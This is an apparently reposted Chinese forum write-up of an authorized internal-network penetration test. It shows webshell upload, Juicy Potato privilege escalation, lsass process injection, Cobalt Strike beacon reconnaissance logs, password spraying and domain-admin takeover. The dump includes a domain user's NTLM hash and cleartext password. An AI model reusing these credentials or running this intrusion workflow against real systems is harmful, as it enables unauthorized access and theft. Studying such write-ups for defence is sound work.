设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 关于某次授权的大型内网渗透测试
返回列表 发新帖
查看: 352|回复: 0

关于某次授权的大型内网渗透测试

[复制链接]
wangqiang

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2023-5-25 20:29:12 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2023-5-25 20:41 编辑

关于某次授权的大型内网渗透测试
用户773616194 红队蓝军 2023-05-25 15:00 发表于四川
转载自:关于某次授权的大型内网渗透测试

背景:
接到朋友邀请,要进行一个授权站点的渗透,但是进去实际环境才发现是多域控主机。也学习了很多后渗透手法,比较受益匪浅。

前期渗透:
打点:(任意文件上传)
直接发现头像处任意文件上传,这里直接上传冰蝎即可。







tasklist查看杀软
  1. System Idle Process              0 N/A                                         
  2. System                           4 N/A                                         
  3. smss.exe                       240 N/A                                         
  4. csrss.exe                      376 N/A                                         
  5. wininit.exe                    436 N/A                                         
  6. services.exe                   524 N/A                                         
  7. lsass.exe                      532 Kdc, KeyIso, Netlogon, NTDS, SamSs         
  8. svchost.exe                    672 BrokerInfrastructure, DcomLaunch, LSM,      
  9.                                    PlugPlay, Power, SystemEventsBroker         
  10. svchost.exe                    716 RpcEptMapper, RpcSs                        
  11. WRSA.exe                       820 WRSVC                                       
  12. svchost.exe                    276 Dhcp, EventLog, lmhosts, Wcmsvc            
  13. svchost.exe                    320 Appinfo, BITS, CertPropSvc, gpsvc, IAS,     
  14.                                    IKEEXT, iphlpsvc, LanmanServer, ProfSvc,   
  15.                                    Schedule, seclogon, SENS, SessionEnv,      
  16.                                    ShellHWDetection, Themes, Winmgmt           
  17. svchost.exe                    516 EventSystem, FontCache, netprofm, nsi,      
  18.                                    W32Time, WinHttpAutoProxySvc               
  19. svchost.exe                    932 CryptSvc, Dnscache, LanmanWorkstation,      
  20.                                    NlaSvc, WinRM                              
  21. svchost.exe                   1100 BFE, DPS, MpsSvc                           
  22. spoolsv.exe                   1508 Spooler                                    
  23. Microsoft.ActiveDirectory     1540 ADWS                                       
  24. OfficeClickToRun.exe          1792 ClickToRunSvc                              
  25. svchost.exe                   1844 ddpvssvc                                    
  26. dfsrs.exe                     1892 DFSR                                       
  27. svchost.exe                   1908 DHCPServer                                 
  28. svchost.exe                   1936 DiagTrack                                   
  29. dns.exe                       1980 DNS                                         
  30. fmaonsite.exe                 2024 FMAuditOnsite                              
  31. ismserv.exe                   1340 IsmServ                                    
  32. Microsoft.BDD.MonitorServ     1432 MDT_Monitor                                 
  33. MSOIDSVC.EXE                  2660 msoidsvc                                    
  34. svchost.exe                   2328 Net Driver HPZ12                           
  35. OpenDNSAuditService.exe       2220 OpenDNS Active Directory Service            
  36. MSOIDSVCM.EXE                 1256 N/A                                         
  37. svchost.exe                   2172 Pml Driver HPZ12                  
  38. ScreenConnect.ClientServi      556 ScreenConnect Client (62c0d7e1d3b94bc5)     
  39. svchost.exe                   1472 TermService                                 
  40. OpenDNSAuditClient.exe        2924 N/A                                         
  41. conhost.exe                   1380 N/A                                         
  42. VGAuthService.exe             2096 VGAuthService                              
  43. vmtoolsd.exe                   612 VMTools                                    
  44. WRCoreService.x64.exe         2136 WRCoreService                              
  45. WRSkyClient.x64.exe           3180 WRSkyClient                                 
  46. dfssvc.exe                    3316 Dfs                                         
  47. WmiPrvSE.exe                  3484 N/A                                         
  48. svchost.exe                   3568 UALSVC, UmRdpService                        
  49. VeeamDeploymentSvc.exe        3612 VeeamDeploySvc                              
  50. WRSvcMetrics.x64.exe          3580 N/A                                         
  51. svchost.exe                   4216 PolicyAgent                                 
  52. msdtc.exe                     4160 MSDTC                                       
  53. DCA.Edge.Console.exe          3676 DCAPulse                                    
  54. iashost.exe                   4548 N/A                                         
  55. wsmprovhost.exe               9104 N/A                                         
  56. powershell.exe                7828 N/A                                         
  57. conhost.exe                   6688 N/A                                         
  58. powershell.exe                 360 N/A                                         
  59. conhost.exe                   5152 N/A                                         
  60. notepad.exe                   1760 N/A                                         
  61. LTSvcMon.exe                  5424 LTSvcMon                                    
  62. LTSVC.exe                     7272 LTService                                   
  63. labvnc.exe                    5412 tvnserver                                   
  64. Veeam.EndPoint.Service.ex     8316 VeeamEndpointBackupSvc                     
  65. wsmprovhost.exe               7108 N/A                                         
  66. ScreenConnect.WindowsBack     4384 N/A                                         
  67. csrss.exe                     7564 N/A                                         
  68. winlogon.exe                  5520 N/A                                         
  69. dwm.exe                       6572 N/A                                         
  70. labvnc.exe                    5916 N/A                                         
  71. taskhostex.exe                8540 N/A                                         
  72. WRSA.exe                      2308 N/A                                         
  73. ScreenConnect.WindowsClie     3732 N/A                                         
  74. explorer.exe                  3964 N/A                                         
  75. MRT.exe                       4852 N/A                                         
  76. vm3dservice.exe               2656 N/A                                         
  77. MRT.exe                       5196 N/A                                         
  78. vmtoolsd.exe                  5340 N/A                                         
  79. DCA.Edge.TrayIcon.exe         6432 N/A                                         
  80. LTTray.exe                    4564 N/A                                         
  81. WmiPrvSE.exe                  6336 N/A                                         
  82. Taskmgr.exe                   6684 N/A                                         
  83. LogonUI.exe                    380 N/A                                         
  84. cmd.exe                       2400 N/A                                         
  85. conhost.exe                   6216 N/A                                         
  86. net.exe                       8100 N/A                                         
  87. net1.exe                      8908 N/A                                         
  88. cmd.exe                       2956 N/A                                         
  89. conhost.exe                   8300 N/A                                         
  90. net.exe                       7344 N/A                                         
  91. net1.exe                      5248 N/A                                         
  92. cmd.exe                        432 N/A                                         
  93. conhost.exe                   9052 N/A                                         
  94. net.exe                       7356 N/A                                         
  95. net1.exe                      3156 N/A                                         
  96. cmd.exe                       8232 N/A                                         
  97. conhost.exe                   4600 N/A                                         
  98. net.exe                       5528 N/A                                         
  99. net1.exe                      7352 N/A                                         
  100. cmd.exe                       4304 N/A                                         
  101. conhost.exe                   7148 N/A                                         
  102. vds.exe                       3872 vds                                         
  103. cmd.exe                       7716 N/A                                         
  104. conhost.exe                   8564 N/A                                         
  105. tasklist.exe                  9212 N/A   
复制代码
内网渗透:
边缘机的systeminfo
因为前期拿到了边缘机,这里查看systeminfo,发现是2012R2的主机。

边缘机提权:(利用烂土豆直接提上权限)
提权之后做进程迁移,直接把进程迁移到lsass进程中去。


内网信息收集:
先查看ip,看是否存在双网卡机
  1. Windows IP Configuration

  3.    Host Name . . . . . . . . . . . . : CAMS-SQL3
  4.    Primary Dns Suffix  . . . . . . . : AVV.org
  5.    Node Type . . . . . . . . . . . . : Hybrid
  6.    IP Routing Enabled. . . . . . . . : No
  7.    WINS Proxy Enabled. . . . . . . . : No
  8.    DNS Suffix Search List. . . . . . : AVV.org

  10. Ethernet adapter Ethernet:

  12.    Connection-specific DNS Suffix  . :
  13.    Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
  14.    Physical Address. . . . . . . . . : 00-50-56-98-E3-D6
  15.    DHCP Enabled. . . . . . . . . . . : No
  16.    Autoconfiguration Enabled . . . . : Yes
  17.    Link-local IPv6 Address . . . . . : fe80::a5b1:d534:730:3123%11(Preferred)
  18.    IPv4 Address. . . . . . . . . . . : 10.2.0.49(Preferred)
  19.    Subnet Mask . . . . . . . . . . . : 255.255.254.0
复制代码

进行域管理员和域控的查看:
域控:
  1. net group "domain controllers" /domain
复制代码
  1. [04/26 18:16:59] beacon> shell net group "domain Controllers" /domain
  2. [04/26 18:17:00] [*] Tasked beacon to run: net group "domain Controllers" /domain
  3. [04/26 18:17:00] [+] host called home, sent: 69 bytes
  4. [04/26 18:17:00] [+] received output:
  5. The request will be processed at a domain controller for domain FPC.LOCAL.

  7. Group name     Domain Controllers
  8. Comment        All domain controllers in the domain

  10. Members

  12. -------------------------------------------------------------------------------
  13. AVV-DC1[        DISCUZ_CODE_250        ]nbsp;                AVV-DC2[        DISCUZ_CODE_250        ]nbsp;                AVV-DHDC01[        DISCUZ_CODE_250        ]nbsp;            
  14. AVV-DHDC02[        DISCUZ_CODE_250        ]nbsp;  
复制代码
域管:
  1. net group "domain admins" /domain
复制代码
  1. fpcadmin                 mqd.ns         
  2. mqd.rmm                  mqd.tdv  
复制代码
前直接归属的域控和主域控:
  1. net time /domain
复制代码
  1. [04/26 18:27:52] beacon> shell net time /domain
  2. [04/26 18:27:52] [*] Tasked beacon to run: net time /domain
  3. [04/26 18:27:52] [+] host called home, sent: 47 bytes
  4. [04/26 18:27:54] [+] received output:
  5. Current time at \\AVV-DC2.FPC.LOCAL is 4/26/2023 5:27:53 AM
复制代码
可以发现当前是直接被DC2所归属,这里查下主控制器。这里直接使用CS插件来进行渗透
  1. [04/26 18:31:11] [+] =========== 查看主域控制器 ==========
  2. [04/26 18:31:12] [*] Tasked beacon to run: netdom query pdc
  3. [04/26 18:31:12] [+] host called home, sent: 47 bytes
  4. [04/26 18:31:14] [+] received output:
  5. Primary domain controller for the domain:

  7. AVV-DC1
  8. The command completed successfully.
复制代码
定位域控的IP地址:这里经过ping之后发现,域控不是都在同一个网段,应该是如下的结构。



内网存活主机探测:
我先进行了DC段和本机段存活主机的探测,这里直接利用cs的插件(portscan)
  1. portscan 10.2.0.0/24
  2. portscan 10.2.92.30/24
  3. portscan 10.6.0.10/24
  4. portscan 10.11.1.12/24
复制代码

fscan扫描本机C段:
潦草的扫描到了ftp的匿名登陆,没有扫描到其他有用信息。这里就不放其他几个段的截图,都没扫描到啥有用的信息。

做hashdump:这里直接做完hashdump之后发现

  1. msv :   
  2.      [00000003] Primary
  3.      * Username : mqd.tdv
  4.      * Domain   : FPC
  5.      * NTLM     : 7007ebae678042f1cf112578ac43bf68
  6.      * SHA1     : 712ce4bf3a4a777582389d37f8d06158ed204f6b
  7.     tspkg :
  8.     wdigest :   
  9.      * Username : mqd.tdv
  10.      * Domain   : FPC
  11.      * Password : QWE123456QE!@#
  12.     kerberos :  
  13.      * Username : mts.tdv
  14.      * Domain   : FPC
  15.      * Password : QWE123456QE!@#
  16.     ssp :   
  17.     credman :
复制代码

CS上:(上线74台)
小插曲:因为渗透到域控的时候,在半夜2点半,所以在拿到DC2的权限的时候,就直接关掉电脑睡觉啦,没有进行留后门和做进程注入,导致第二天上线的时候执行命令出现如下界面。
这里的意思就是启动新进程的时候,系统无法将当前进程的令牌传递给新进程。也就是无法创建进程,所以只能通过其他方式来进行横向渗透。并且后期发现该域管理员密码已经进行修改。
DC挂掉之后的想到的几种方式:
(1)抓去已控主机的hash看是否有其他域管登陆(失败)
  1. 因为前面已经拿到了100多台机子的权限,所以能想到的第一个思路就是把100多台主机上的hash都进行一个抓起取,然后看是否可以抓到域管的账号,但是这里抓完之后会发现,没有一台域管是上线的,所以这里也比较无语。
复制代码
(2)利用CVE漏洞来进行横向(失败)
  1. 因为之前探测到DC的版本是windows2012 R2版本,所以想到了用ms17-010来进行内网横向,但是这里经过检测之后发现也没有ms17-010的漏洞,所以无法进行横向
复制代码
(3)利用CVE漏洞来子域控(CVE-2020-1472)(失败)
  1. 这里经过尝试CVE-2020-1472漏洞,也没有发现可以横向上去,通过poc检测发现是fail的。
复制代码
(4)尝试攻击exchange服务器,来中继攻陷主机(失败)
  1. 这里就不放细节了,均以失败告终。
复制代码

峰回路转:(DC2子域控上线)
DC2子域控上线过程:
这里经过一天的折磨之后发现,以上的几种方式不好使,但是想到了抓取机器用户的hash,通过构造密码表,来进行域管的密码喷洒,这里抓取了100多个的机器用户和几个域内用户做成密码表,重新进行内网横向。
这里截图部分域内用户,做成密码表后直接进行喷洒,发现域管成功上线。

DC2子域权限维持:
  1. (1)把当前进程注入到lsass进程中去。
复制代码
其他域控上线这里也是一个小Tip,也是提供给大家的一个思路在有权限的情况下,可以添加域管理员,然后通过域管理员来进行横向其他域控(这是仅限于一个域),但是上面给出来了结构,
这个域都是在一个域内的,所以的话,就可以进行添加管理员来上线。这里直接放后期上线的域控。

总结:
经过这次实战总结了很多小的技巧。
(1)可以通过添加域管理员来上线域内的所有主机
(2)可以通过cs来进行进程注入or进程迁移,来实现本机system权限的获取
(3)此次实战的密码喷洒尤为重要,所以有机器用户的hash一定要进行抓取
(4)SPN服务横向可以通过打邮服来进行获取域控权限
(5)学习了权限维持的方法(开机自启动、winrm的横向和psexec的横向)恶补了一大波内网知识(比靶场来的实在)
不足之处:
(1)此次通过内网渗透,虽然打了邮件服务器,但是没有通过邮件服务器来拿下DC的权限。
(2)没有通过SPN票据横向拿下对应的服务器,比如MSSQL的和CIFS的
(3)此次没有利用白银票据进行横向(得重新学习)   

文章来源于:https://forum.butian.net/share/2261 若有侵权请联系删除




回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-20 21:07 , Processed in 0.017566 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表